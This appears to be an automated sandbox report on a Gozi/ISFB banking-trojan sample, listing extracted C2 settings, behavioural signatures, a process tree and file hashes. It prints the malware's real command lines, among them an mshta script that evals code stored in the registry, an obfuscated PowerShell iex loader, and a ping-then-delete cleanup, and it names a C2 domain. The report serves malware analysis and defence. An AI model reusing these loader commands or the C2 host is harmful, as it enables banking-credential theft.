gozi | 40bbc905f9521a2892abf91df0ed1678caf43be3c05f2aaf4192707d84f94665

Analysis

max time kernel
156s
max time network
166s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
13-10-2023 01:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

url/Cliente.url
Size

194B
MD5

0da2f6812c1bc76eaa25be1e6a2eaf4c
SHA1

e4b237e5f7bb7b96e9bfb43c126541fc892d3b0a
SHA256

0042887574aae1f954f0459b9448c0fa4501bb8719843940315d466645da9a7b
SHA512

a5495580fae00444b4edbff6894e1e302025ddff295a26fe519bc229724d3961646afb1cece2be892b19840035152a937fa3f7910e4fe04adea751eb319d96cb

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

8 4236 rundll32.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

4236 rundll32.exe

flow	pid	process
8	4236	rundll32.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4460 set thread context of 3296	4460	powershell.exe	Explorer.EXE
PID 3296 set thread context of 3840	3296	Explorer.EXE	RuntimeBroker.exe
PID 3296 set thread context of 4792	3296	Explorer.EXE	cmd.exe
PID 4792 set thread context of 4192	4792	cmd.exe	PING.EXE
PID 3296 set thread context of 1436	3296	Explorer.EXE	WinMail.exe
PID 3296 set thread context of 700	3296	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

rundll32.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000_Classes\Local Settings rundll32.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4192 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

4192 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000_Classes\Local Settings	rundll32.exe

pid	process
4192	PING.EXE

pid	process
4192	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

rundll32.exepowershell.exeExplorer.EXE

pid	process
4236	rundll32.exe
4236	rundll32.exe
4460	powershell.exe
4460	powershell.exe
4460	powershell.exe
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE
3296	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3296 Explorer.EXE
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4460 powershell.exe
3296 Explorer.EXE
3296 Explorer.EXE
4792 cmd.exe
3296 Explorer.EXE
3296 Explorer.EXE

pid	process
3296	Explorer.EXE

pid	process
4460	powershell.exe
3296	Explorer.EXE
3296	Explorer.EXE
4792	cmd.exe
3296	Explorer.EXE
3296	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeShutdownPrivilege	3296	Explorer.EXE
Token: SeCreatePagefilePrivilege	3296	Explorer.EXE
Token: SeShutdownPrivilege	3296	Explorer.EXE
Token: SeCreatePagefilePrivilege	3296	Explorer.EXE
Token: SeShutdownPrivilege	3296	Explorer.EXE
Token: SeCreatePagefilePrivilege	3296	Explorer.EXE
Token: SeShutdownPrivilege	3296	Explorer.EXE
Token: SeCreatePagefilePrivilege	3296	Explorer.EXE
Token: SeShutdownPrivilege	3296	Explorer.EXE
Token: SeCreatePagefilePrivilege	3296	Explorer.EXE
Token: SeShutdownPrivilege	3296	Explorer.EXE
Token: SeCreatePagefilePrivilege	3296	Explorer.EXE
Token: SeShutdownPrivilege	3296	Explorer.EXE
Token: SeCreatePagefilePrivilege	3296	Explorer.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundll32.exe

pid process

1112 rundll32.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3296 Explorer.EXE

pid	process
1112	rundll32.exe

pid	process
3296	Explorer.EXE

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

rundll32.execontrol.exerundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1112 wrote to memory of 4588	1112	rundll32.exe	control.exe
PID 1112 wrote to memory of 4588	1112	rundll32.exe	control.exe
PID 4588 wrote to memory of 4492	4588	control.exe	rundll32.exe
PID 4588 wrote to memory of 4492	4588	control.exe	rundll32.exe
PID 4492 wrote to memory of 4236	4492	rundll32.exe	rundll32.exe
PID 4492 wrote to memory of 4236	4492	rundll32.exe	rundll32.exe
PID 4492 wrote to memory of 4236	4492	rundll32.exe	rundll32.exe
PID 2480 wrote to memory of 4460	2480	mshta.exe	powershell.exe
PID 2480 wrote to memory of 4460	2480	mshta.exe	powershell.exe
PID 4460 wrote to memory of 5012	4460	powershell.exe	csc.exe
PID 4460 wrote to memory of 5012	4460	powershell.exe	csc.exe
PID 5012 wrote to memory of 952	5012	csc.exe	cvtres.exe
PID 5012 wrote to memory of 952	5012	csc.exe	cvtres.exe
PID 4460 wrote to memory of 3484	4460	powershell.exe	csc.exe
PID 4460 wrote to memory of 3484	4460	powershell.exe	csc.exe
PID 3484 wrote to memory of 3772	3484	csc.exe	cvtres.exe
PID 3484 wrote to memory of 3772	3484	csc.exe	cvtres.exe
PID 4460 wrote to memory of 3296	4460	powershell.exe	Explorer.EXE
PID 4460 wrote to memory of 3296	4460	powershell.exe	Explorer.EXE
PID 4460 wrote to memory of 3296	4460	powershell.exe	Explorer.EXE
PID 4460 wrote to memory of 3296	4460	powershell.exe	Explorer.EXE
PID 3296 wrote to memory of 3840	3296	Explorer.EXE	RuntimeBroker.exe
PID 3296 wrote to memory of 3840	3296	Explorer.EXE	RuntimeBroker.exe
PID 3296 wrote to memory of 3840	3296	Explorer.EXE	RuntimeBroker.exe
PID 3296 wrote to memory of 3840	3296	Explorer.EXE	RuntimeBroker.exe
PID 3296 wrote to memory of 4792	3296	Explorer.EXE	cmd.exe
PID 3296 wrote to memory of 4792	3296	Explorer.EXE	cmd.exe
PID 3296 wrote to memory of 4792	3296	Explorer.EXE	cmd.exe
PID 3296 wrote to memory of 4792	3296	Explorer.EXE	cmd.exe
PID 3296 wrote to memory of 4792	3296	Explorer.EXE	cmd.exe
PID 4792 wrote to memory of 4192	4792	cmd.exe	PING.EXE
PID 4792 wrote to memory of 4192	4792	cmd.exe	PING.EXE
PID 4792 wrote to memory of 4192	4792	cmd.exe	PING.EXE
PID 4792 wrote to memory of 4192	4792	cmd.exe	PING.EXE
PID 3296 wrote to memory of 1436	3296	Explorer.EXE	WinMail.exe
PID 3296 wrote to memory of 1436	3296	Explorer.EXE	WinMail.exe
PID 3296 wrote to memory of 1436	3296	Explorer.EXE	WinMail.exe
PID 4792 wrote to memory of 4192	4792	cmd.exe	PING.EXE
PID 3296 wrote to memory of 1436	3296	Explorer.EXE	WinMail.exe
PID 3296 wrote to memory of 1436	3296	Explorer.EXE	WinMail.exe
PID 3296 wrote to memory of 700	3296	Explorer.EXE	cmd.exe
PID 3296 wrote to memory of 700	3296	Explorer.EXE	cmd.exe
PID 3296 wrote to memory of 700	3296	Explorer.EXE	cmd.exe
PID 3296 wrote to memory of 700	3296	Explorer.EXE	cmd.exe
PID 3296 wrote to memory of 700	3296	Explorer.EXE	cmd.exe
PID 3296 wrote to memory of 700	3296	Explorer.EXE	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3296

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\Cliente.url
2⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\System32\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl",
3⤵
- Suspicious use of WriteProcessMemory
PID:4588

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl",
4⤵
- Suspicious use of WriteProcessMemory
PID:4492

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl",
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4236

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>O8ie='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(O8ie).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C007E561-1FD8-F246-A9F4-C346ED68A7DA\\\GlobalPlay'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:2480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xmocyoxeca -value gp; new-alias -name uwdhgkyjvg -value iex; uwdhgkyjvg ([System.Text.Encoding]::ASCII.GetString((xmocyoxeca "HKCU:Software\AppDataLow\Software\Microsoft\C007E561-1FD8-F246-A9F4-C346ED68A7DA").VirtualActive))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4460

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:5012

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFEED.tmp" "c:\Users\Admin\AppData\Local\Temp\123q5kxh\CSCD8F288A0F8FC42ADA1EFBAAB9E33C6D.TMP"
5⤵
PID:952

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3484

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF99.tmp" "c:\Users\Admin\AppData\Local\Temp\nhqex5fl\CSC869BF5DEA9C2407C9078EDC455DF949.TMP"
5⤵
PID:3772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4792

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4192

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:1436

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:700

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3840

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl
Filesize
206KB

MD5
72e2a5c797954e895a41be5b20f867b2

SHA1
419aacfb3ccea9b08277bcc9405054fa4238a597

SHA256
858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

SHA512
77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.dll
Filesize
3KB

MD5
db160ce78cc8849b45f430deb0dd360d

SHA1
29c383343dfd9c2503730d23d1290db329e4db6f

SHA256
d1ad2e0997219437a0fb45e0c8b017900796c98bd9dbe27fb9ba0dbf36f72b70

SHA512
ba0aba26e7ced18ead1e12bf6928afa3f20548870687dad5a37cb81f667f04f9a94883fc4767e532878f2a60ac5f1e2b98383191fe7f41e0053877e1d0001376

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFEED.tmp
Filesize
1KB

MD5
583c116dd357c8c69518ddfe993d3a64

SHA1
0482e0559132492f83681ebe7e6654d42957882f

SHA256
befcbd2ea572d67352bea5da07f32de7d3097bc011217a263c818dfd5782b187

SHA512
3142ad01bcde4bdee22c367241df94ff7248876d342eca783dd0cedae0ab728bd02994d30d64ac51cb240814a12d11c16f8ea625072113bc420a5551d536848f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFF99.tmp
Filesize
1KB

MD5
8ce6684665928dddf230c12165e3efbc

SHA1
e9eb46ffd29ab7614854c414ba268faddcc6aefc

SHA256
0c37d612355061ea234b9b6d9b56d386b75a449437402da66d8882bb02e42d5a

SHA512
b1f68d30fad807dc2c3b46d9e710d23902f3862a5991ccb55f9b263ec06d40dc2b293480cf9ba6d3b9cb0d1e92c1b199b2134ff947080bddecdf7c34602b52a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e43mj5bz.wbh.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.dll
Filesize
3KB

MD5
ffc4692689dfe0b0bc47e197c0740016

SHA1
327db1dadfdda687629bc64db10de2988cdb8fff

SHA256
ea658b845aa888818d511da4d4c2917ff1c5ef1c3c3cc2cb36a99eb7e53e1c1c

SHA512
29077450cb176d7b2bbbc61e552091c3fb4c9b7a94cd22fc0ddc524dc0e0eb61c1669316cc5da4153d55f9480d51cd31dd8a47d5d24731f02a2a427591b31bd3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.cmdline
Filesize
369B

MD5
bd06dc5b128da823d3627ca45590483f

SHA1
0eeca05b5d3015f70a1918916dda46d996940483

SHA256
5a4852c3ee746929c59ad71f75beb9938bc9d8cc2fb73e3f8929b7477a2e6c08

SHA512
81906054b13421fbee1e7dd06a1df07fe0da8820cc06c40300aa5745a9356036a3ac8d65208b3af4c8d7e450baee667b75097c2a197a083c83110c8c2f5b9a2c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\123q5kxh\CSCD8F288A0F8FC42ADA1EFBAAB9E33C6D.TMP
Filesize
652B

MD5
01d748f1649d191d7071e06196b79300

SHA1
250d50fa519143d3e75b1e605c7f45c276cc1d89

SHA256
7693d16f1acfa7f35b877e99d313d84c9a5fa9a42721888c17367f993ff92eb5

SHA512
1fe0ad376ec3ad830b4a1f2ef4fb87f316c166fbda20f15a623c747f1b03656e3df7f9c40cb270674365d7250723b2d78307167f24c71d7c9e69c2c3dc687895

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nhqex5fl\CSC869BF5DEA9C2407C9078EDC455DF949.TMP
Filesize
652B

MD5
a983f9fbfe68e9385733cee793f78d23

SHA1
d7eda52ec169c6de71e44e698a3e4b4d3aeb226e

SHA256
5cfed296c0a288354ea200729bff96fafc847cc19483c4aee7c9d42e94f60757

SHA512
3ee38b59e53252dee5400924271ac5478cb209882018e56bb691621006639b5b7417d0aa1ba3d1e2cbfc909925dbc4a2c4b242b5631d0e57ee7d612be7be9b91

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.cmdline
Filesize
369B

MD5
7e78599de5869c89b3e678da82bcff6e

SHA1
fd69b3c68b5f1606c08c106e989acfc236fa6202

SHA256
eeae0a489d983887916adb2990856b15799c39c327a74fe446c44266071da600

SHA512
95032f3603be963eda9d3fa00b0f14d5c6102736daa4c07b1d91ef16ff2630df7aca1d075a8ae4d92ef2c2c45ee06213e5d1cdbb949f0cdc7bc4047041eebf1b

Download Submit
\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl
Filesize
206KB

MD5
72e2a5c797954e895a41be5b20f867b2

SHA1
419aacfb3ccea9b08277bcc9405054fa4238a597

SHA256
858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

SHA512
77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

Download Submit
memory/700-141-0x0000000003300000-0x0000000003398000-memory.dmp

Filesize
608KB

Download
memory/700-134-0x0000000003300000-0x0000000003398000-memory.dmp

Filesize
608KB

Download
memory/700-137-0x0000000000E40000-0x0000000000E41000-memory.dmp

Filesize
4KB

Download
memory/1436-129-0x0000023B21F40000-0x0000023B21FE4000-memory.dmp

Filesize
656KB

Download
memory/1436-120-0x0000023B21F40000-0x0000023B21FE4000-memory.dmp

Filesize
656KB

Download
memory/1436-121-0x0000023B21F10000-0x0000023B21F11000-memory.dmp

Filesize
4KB

Download
memory/3296-135-0x0000000002F60000-0x0000000003004000-memory.dmp

Filesize
656KB

Download
memory/3296-76-0x0000000002F60000-0x0000000003004000-memory.dmp

Filesize
656KB

Download
memory/3296-77-0x0000000001090000-0x0000000001091000-memory.dmp

Filesize
4KB

Download
memory/3840-142-0x000001D82C590000-0x000001D82C634000-memory.dmp

Filesize
656KB

Download
memory/3840-93-0x000001D82C590000-0x000001D82C634000-memory.dmp

Filesize
656KB

Download
memory/3840-94-0x000001D82A060000-0x000001D82A061000-memory.dmp

Filesize
4KB

Download
memory/4192-145-0x000001E1CB190000-0x000001E1CB234000-memory.dmp

Filesize
656KB

Download
memory/4192-115-0x000001E1CAEF0000-0x000001E1CAEF1000-memory.dmp

Filesize
4KB

Download
memory/4192-114-0x000001E1CB190000-0x000001E1CB234000-memory.dmp

Filesize
656KB

Download
memory/4236-6-0x00000000048A0000-0x00000000048C9000-memory.dmp

Filesize
164KB

Download
memory/4236-7-0x00000000048E0000-0x00000000048EE000-memory.dmp

Filesize
56KB

Download
memory/4236-8-0x0000000004D50000-0x0000000004D5D000-memory.dmp

Filesize
52KB

Download
memory/4236-11-0x00000000048E0000-0x00000000048EE000-memory.dmp

Filesize
56KB

Download
memory/4236-112-0x00000000048E0000-0x00000000048EE000-memory.dmp

Filesize
56KB

Download
memory/4460-70-0x0000023275130000-0x0000023275138000-memory.dmp

Filesize
32KB

Download
memory/4460-56-0x000002325CCE0000-0x000002325CCE8000-memory.dmp

Filesize
32KB

Download
memory/4460-19-0x00000232750B0000-0x00000232750D2000-memory.dmp

Filesize
136KB

Download
memory/4460-91-0x0000023275140000-0x000002327517D000-memory.dmp

Filesize
244KB

Download
memory/4460-90-0x00007FFC7FBF0000-0x00007FFC805DC000-memory.dmp

Filesize
9.9MB

Download
memory/4460-74-0x0000023275140000-0x000002327517D000-memory.dmp

Filesize
244KB

Download
memory/4460-72-0x00000232751A0000-0x00000232751B0000-memory.dmp

Filesize
64KB

Download
memory/4460-21-0x00007FFC7FBF0000-0x00007FFC805DC000-memory.dmp

Filesize
9.9MB

Download
memory/4460-25-0x00000232753B0000-0x0000023275426000-memory.dmp

Filesize
472KB

Download
memory/4460-24-0x00000232751A0000-0x00000232751B0000-memory.dmp

Filesize
64KB

Download
memory/4460-23-0x00000232751A0000-0x00000232751B0000-memory.dmp

Filesize
64KB

Download
memory/4792-105-0x000001C7A5560000-0x000001C7A5604000-memory.dmp

Filesize
656KB

Download
memory/4792-144-0x000001C7A5560000-0x000001C7A5604000-memory.dmp

Filesize
656KB

Download
memory/4792-106-0x000001C7A52A0000-0x000001C7A52A1000-memory.dmp

Filesize
4KB

Download